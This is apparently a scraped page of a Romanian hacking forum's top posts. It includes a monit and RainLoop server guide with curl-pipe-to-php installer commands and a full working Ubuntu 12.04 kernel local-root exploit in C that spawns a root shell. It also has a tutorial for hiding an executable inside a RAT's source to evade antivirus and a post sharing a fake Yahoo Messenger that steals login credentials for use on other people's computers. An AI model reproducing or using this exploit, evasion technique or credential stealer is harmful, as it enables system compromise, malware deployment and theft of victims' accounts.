Dept. of Monitoring Technologies commonName = Common Name (FQDN of your server) commonName_default = server.monit.mo emailAddress = Email Address emailAddress_default = root@monit.mo [ cert_type ] nsCertType = server Now we create the certificate like this: openssl req -new -x509 -days 365 -nodes -config ./monit.cnf -out /var/certs/monit.pem -keyout /var/certs/monit.pem openssl gendh 512 >> /var/certs/monit.pem openssl x509 -subject -dates -fingerprint -noout -in /var/certs/monit.pem chmod 700 /var/certs/monit.pem Afterwards we edit /etc/default/monit to enable the monit daemon. Change startup to 1 and set CHECK_INTERVALS to the interval in seconds that you would like monit to check your system. I choose 60 (seconds) so my file looks like this: vi /etc/default/monit # Defaults for monit initscript # sourced by /etc/init.d/monit # installed at /etc/default/monit by maintainer scripts # Fredrik Steen <stone@debian.org> # You must set this variable to for monit to start startup=1 # To change the intervals which monit should run uncomment # and change this variable. CHECK_INTERVALS=60 Finally, we can start monit: /etc/init.d/monit start Now point your browser to https://www.server.com:2812/ (make sure port 2812 isn’t blocked by your firewall), log in with admin and test, and you should see the monit web interface. It should look like this: Install RainLoop SIMPLE, MODERN & FAST WEB-BASED EMAIL CLIENT move to cd /var/www/ You can also deploy the latest version of the application without a need to deal with zip archive, just run one of the following commands in your terminal: curl -s http://repository.rainloop.net/installer.php | php or wget -qO- http://repository.rainloop.net/installer.php | php Upon uploading the package content, be sure to configure permissions for files and directories. This is all you have to do in order to ensure running the application with its default configuration. The product will create all the required files on first run, and it will report an error if any requirement is not met. Source: Debian Server: How to
    1 point
  5. sensi
    /** * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit * by Vitaly Nikolenko (vnik5287@gmail.com) * * based on semtex.c by sd * * Supported targets: * [0] Ubuntu 12.04.0 - 3.2.0-23-generic * [1] Ubuntu 12.04.1 - 3.2.0-29-generic * [2] Ubuntu 12.04.2 - 3.5.0-23-generic * * $ gcc vnik.c -O2 -o vnik * * $ uname -r * 3.2.0-23-generic * * $ ./vnik 0 */ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h> #define BASE 0x1780000000 #define SIZE 0x0010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); uint64_t targets[3][3] = {{0xffffffff81ef67e0, // perf_swevent_enabled 0xffffffff81091630, // commit_creds 0xffffffff810918e0}, // prepare_kernel_cred {0xffffffff81ef67a0, 0xffffffff81091220, 0xffffffff810914d0}, {0xffffffff81ef5940, 0xffffffff8107ee30, 0xffffffff8107f0c0} }; void __attribute__((regparm(3))) payload() { uint32_t *fixptr = (void*)AB(1); // restore the handler *fixptr = -1; commit_creds_fn commit_creds = (commit_creds_fn)AB(2); prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); commit_creds(prepare_kernel_cred((uint64_t)NULL)); } void trigger(uint32_t off) { uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert( !close(fd) ); } int main(int argc, char **argv) { uint64_t off64, needle, kbase, *p; uint8_t *code; uint32_t int_n, j = 5, target = 1337; int offset = 0; void *map; assert(argc == 2 && "target?"); assert( (target = atoi(argv[1])) < 3 ); struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt; // mmap user-space block so we don't page fault // on sw_perf_event_destroy assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE); asm volatile("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; printf("IDT addr = 0x%lx\n", idt.addr); assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13); // can only play with interrupts 3, 4 and 0x80 for (int_n = 3; int_n <= 0x80; int_n++) { for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { int off32 = off64; if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { offset = off32; goto out; } } if (int_n == 4) { // shit, let's try 0x80 if the kernel is compiled with // CONFIG_IA32_EMULATION int_n = 0x80 - 1; } } out: assert(offset); printf("Using int = %d with offset = %d\n", int_n, offset); for (j = 0; j < 3; j++) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; } trigger(offset); switch (int_n) { case 3: asm volatile("int $0x03"); break; case 4: asm volatile("int $0x04"); break; case 0x80: asm volatile("int $0x80"); } assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); } source
    1 point
  6. LLegoLLaS
    Host 1 Free Space:1 0Gb Ram: 128 MB Ram Burst: 640 MB Lasts for: FOREVER. Free-Trial-RegistrationCloud Share Space: 300Gb Ram: 10240 Mb Ram Burst: 10240 Mb Lasts for: 14 Days VPS.me Space: 5Gb Ram: 384 Mb Burst: ???? Lasts for: 1 YEAR+ Atum Hosting Package 1 Space: 25Gb Ram: 512mb Burst: ???? Lasts for: 15 DAYS Package 2 Space: 50Gb RAM: 1Gb Burst: ??? Lasts for: 15 DAYS Package 3 Space: 50Gb RAM: 2Gb Burst: ??? Lasts for: 15 DAYS Elastic Host Space: 20GB RAM: 1GB Burst: ??? Lasts for: 5 DAYS Microsoft Windows Azure Space: 35GB RAM: 128MB Burst: 128MB Lasts for: 90 DAYS Amazon Web Services Space: 5GB RAM: 613MB Burst: 613MB Lasts for: 1 YEAR AWS Free Usage Tier NephoScale Cloud Computing Space: 10GB RAM: 256MB Burst: 256MB Lasts for: 1 YEAR KVM Vserver (thanks Twiff) Space: upto 250 GB RAM: upto 4 GB Lasts for: 12 hours !!! Romania e restrictionata pe multe din ele deci folositi prezervativ la inregistrare Thanks to...someone...
    1 point
  7. Stfean_Iordache
    Salut . Da , e site-ul meu . Salut . E treaba ta ce faci , dar daca vad ca ai 20 refs si toti cu fix 200 actiuni ai ban . Plm . Am primit un rep negativ la post pentru ca cineva a crezut ca eu sunt asta de a postat . Rog un mod sa verifice ip-urile sa vada ca nu am nici o treaba cu el . De asemenea priviti aici userul lui : //deleted by me// eu nu am nici o legatura cu el !
    -1 points
  8. .bucibreaker
    @askwrite sunt de mult nu de azi ) poveste lunga @.Breaker fara .dll ) sunt simplu.
    -1 points
  9. Ganav
    Am observat ca, mai nou, majoritatea antivirus-urilor pot detecta daca o aplicatie foloseste optiunea de embedded resource pentru a ascunde un executabil. Prin embedded resources se pot incapsula intr-un executabil mai multe fisiere de orice tip(text, media chiar si executabile). Optiunea este valabila in visual studio incepand cu versiunea din 2008. Am scris un mic program care citeste in binar un fisier .exe si il transforma intr-un sir de octeti, care sunt reprezentati printr-o variabila. Avem nevoie de viusal studio c++ express care se gaseste aici: http://www.visualstudio.com/downloads/download-visual-studio-vs Dupa instalare cream un proiect Win32 Console Application: File->New Project->Win32->Win32 Console Application Dupa ce alegem un nume dam click Ok, Next si bifam optiunea de Empty Project dupa care dam click Finish Acum cream urmatoarele fisiere: In folderul de HeaderFiles(in stanga project explorer) click dreapta Add->New Item, alegem un fisier de tip .h(antet): includes.h: #ifndef INCLUDES_H #include <iostream> #include <fstream> #include <string> #endif Fisierul de mai sus include toate fisierele antet de care avem nevoie. Repetam pasii si adaugam: ReadWrite.h #ifndef READWRITE_H #include "includes.h" #endif struct HexCharStruct { unsigned char c; HexCharStruct(unsigned char _c) : c(_c) { } }; inline std::ostream& operator<<(std::ostream& o, const HexCharStruct& hs) { return (o << std::hex << (int)hs.c); } // Functia se asigura ca ceea ce printam cu << este in hex. Comportamentul implicit este // afisarea in baza zecimala inline HexCharStruct hex(unsigned char _c) { return HexCharStruct(_c); } void readWrite(std::string src_file, std::string dst_file); Acum dam click pe SourceFiles si adaugam un fisier sursa(.cpp): ReadWrite.cpp #include "ReadWrite.h" void readWrite(std::string src_file, std::string dst_file) { char byte; std::string bytes; const size_t max_block = 16380; std::ifstream src_file_h (src_file, std::ios::in|std::ios::binary); if (src_file_h.is_open()) { // Atata timp cat avem ceva de citit din fisier, citim intr-un octet pe care il urcam in // string-ul bytes while (src_file_h.get(byte)) { bytes.push_back(byte); } std::cout << "[I] File " << src_file << " read successfully\n"; } else { std::cout << "Unable to open source file " << src_file << std::endl; std::exit(1); } std::ofstream dst_file_h (dst_file, std::ios::binary); if (dst_file_h.is_open()) { // Acum scriem sirul de octeti intr-un fisier sursa in format C dst_file_h << "char embedded[] = \""; for(size_t i = 0; i < bytes.size(); i++) // Urmatorul test este necesar intrucat visual studio nu poate procesa string-uri mai mari ca 16380 // Intrebam daca i este un multiplu al lui 16380 si este diferit de 0(altfel pune un spatiu // chiar la inceput) if(!(i % max_block) && i) dst_file_h << "\\x" << hex(bytes[i]) << "\"\n\""; else dst_file_h << "\\x" << hex(bytes[i]); dst_file_h << "\";" << std::endl; dst_file_h << "size_t numbytes = " << "0x" << bytes.size() << ";" << std::endl; } else { std::cout << "Unable to open destination file " << dst_file << std::endl; std::exit(1); } // Inchidem fisierele src_file_h.close(); dst_file_h.close(); } Repetam pasii si adaugam un nou fisier sursa(.cpp): main.cpp #include "includes.h" #include "ReadWrite.h" void usage(char **argv) { std::cout << "Usage: " << argv[0] << ": <exe_file> <dst_file>" << std::endl; exit(0); } int main(int argc, char **argv) { if(argc != 3) { usage(argv); } #ifndef NDEBUG // Teste. Rulam urmatorul exemplu doar in debug mode readWrite("testdll.dll", "bytecode.c"); #else // Pe bune. In release mode. // src_file este fisierul executabil pe care vrem sa il convertim in sir de octeti. Trebuie sa existe si sa // prezent in directorul in care se gaseste executabilul. Daca nu este trebuie adaugata intreaga cale // catre fisier. std::string src_file(argv[1]); std::string dst_file(argv[2]); readWrite(src_file, dst_file); #endif return 0; } Apasam pe F7 pentru a compila programul(Build Solution). In dst_file avem linii similare cu: char embedded[] = "\x4d\x5a\x90\x0\x3\x0\x0\x0\x4\x0\x0\x0\xff\xff\x0\x0\xb8\x0\x0\x0\x0\x0\x0\x0\x40\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0x0"; size_t numbytes = 0x7a00; In embedded se gaseste executabilul nostru. Copiem respectivele linii intr-un proiect(RAT) la ale carui surse avem acces. Ne putem folosi de urmatoarea functie pentru a scrie string-ul(variabila embedded) intr-un fisier extern: void write2Bin(std::string dst_file, char bytes[], size_t numbytes) { std::ofstream dst_file_h (dst_file, std::ios::out|std::ios::binary); if (dst_file_h.is_open()) { for(size_t i = 0; i < numbytes; i++) dst_file_h << bytes[i]; std::cout << "[I] File " << dst_file << " written successfully\n"; } else { std::cout << "Unable to open source file " << dst_file << std::endl; std::exit(1); } } Functia de mai sus este plasata de asemenea in unul din fisierele sursa ale RAT-ului. Astfel, antivirusul nu detecteaza resursa ca fiind de tip embedded.
    -1 points
  10. vHacker
    Salut , am sa va prezint un messenger fals , ce face acest program? Pai simplu , odata introduse numele si parola , le memoreaza si le scrie intr-un fisier in C:/luke999 Link download aici . FileShare Download Yahoo! Messenger.exe L-am scanat , sa nu crede-ti ca-i vre-un virus https://www.virustotal.com/en/file/a3664051bd3e504291742b05f12cbdc15c30f3a523234181e499cf9e57408aac/analysis/ Cam atat , nu-i cine stie ce , dar ii bunicel , e mic compact , il poti pune pe stick si apoi pe un PC public / la un amic/ etc. stiti voi ce face-ti cu el
    -1 points
×
×
  • Create New...